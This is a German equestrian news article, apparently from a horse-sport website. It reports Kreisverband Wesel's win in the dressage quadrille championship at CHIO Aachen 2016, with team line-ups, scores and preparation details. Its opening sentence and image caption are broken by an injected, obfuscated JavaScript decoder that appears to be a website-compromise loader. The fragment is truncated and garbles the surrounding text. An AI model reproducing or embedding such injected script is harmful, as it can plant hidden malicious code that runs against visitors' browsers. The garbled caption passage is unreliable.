CHIO Aachen: Kreisverband Wesel siegreich beim Quadrillen-Championat

17. Juli 2016 | Von Redaktion | Kategorie: Sport
Dem siegreichen Kreisreiterverb<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Wesel gratulieren Caroline Fister-Hartmann und Christoph Hartmann, Herausgeber des Stadtmagazins Bad Aachen, sowie ALRV-Aufsichtsratsmitglied Wolfgang „Tim“ Hammer (Mitte) (Foto: CHIO Aachen/Michael Strauch).” width=”600″ height=”400″ />

[Aachen (GER)]. Mit 19,5 Punkten war der Kreisverband Wesel der Konkurrenz weit voraus im (Dressur-)Quadrillen-Championat des CHIO Aachen um den Preis des Handwerks. Platz zwei ging an die vier Lokalmatadoren des Kreisverbands Aachen unter der Leitung von Sabine Rüben. Jennifer Bücken mit Perry Dream, Vanessa Dornhöfer auf Savoir Vivre, Ines Theelen mit Dream Dancer und Simone Thies mit Don Destello kamen auf 18,3 Punkte. Rang drei ging mit genau 17 Punkten an das Team vom Kreisverband Mettman mit Mannschaftsführerin Chantal van de Griend und den Reiterinnen Sarina Bamme auf Egon Hurry up, Diane Bona mit Lennox Luis, Patricia Knell mit Fürst Finaldo und Stephanie Knell im Sattel von Don Giovann.

Helmi Abeck vom siegenden Kreisverband Wesel kann gar nicht mehr zählen, wie oft sie mit ihren Reiterinnen schon das Quadrillen-Championat um den Preis des Handwerks beim Weltfest des Pferdesports gewonnen hat – „Oft, sehr oft!“ Heute knüpfte sie mit ihrem Quartett, bestehend aus Lisa Behr mit Waleika, Sina Döller auf Genaro Royale M, Nathalie Overmann mit Rolex M und Petra Wolf auf Don Dooley, nahtlos an die Erfolgsserie an.

Beim Quadrillen-Championat reiten die Mannschaften jeweils zu viert eine Dressurkür nach eigener Choreografie auf dem Niveau der Klasse M zu Musik eigener Wahl. Wesels Mannschaftsführerin Helmi Abeck hat die Choreografie im Laufe der Zeit etwas aufgepeppt, aber im Wesentlichen unverändert gelassen („Funktioniert ja!“). Diesmal hatte sie drei neue Reiterinnen in der Quadrille. Für die Vorbereitung hatte sie sich drei Wochen Zeit gelassen, in denen sich das Team zwei- bis dreimal pro Woche zum Üben getroffen hat. Das hieß zu Anfang vor allem: Ablaufen der Choreografie bis die Abläufe der Lektionen in Fleisch und Blut übergegangen waren. Erst dann wurde zu Pferd geübt.

Ein wichtiger Faktor bei Quadrillen-Prüfungen ist neben Musik und Aufbau der Choreografie das Herausbringen der Pferde und Reiter. Sie sollten gut zueinander passen und alle gleich „angezogen“ sein. Das kleinste gemeinsame Vielfache des Quartetts aus Wesel waren vor allem die Swarovski-Steine auf Fliegenhauben und in jedem zweiten Mähnenzopf. Ob das was mit dem Motto der Mannschaft zu tun hat? Helmi Abeck gibt zu, dass sie und ihr Team eigentlich gar kein richtiges Motto hatten. Eingedenk der funkelnden Ausstattung ihrer Reiterinnen meint sie dann aber doch: „Vielleicht: ,Wir greifen nach den Sternen’.“ Hat funktioniert.

Tags: , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=138167

Hier klicken, um einen Kommentar zu schreiben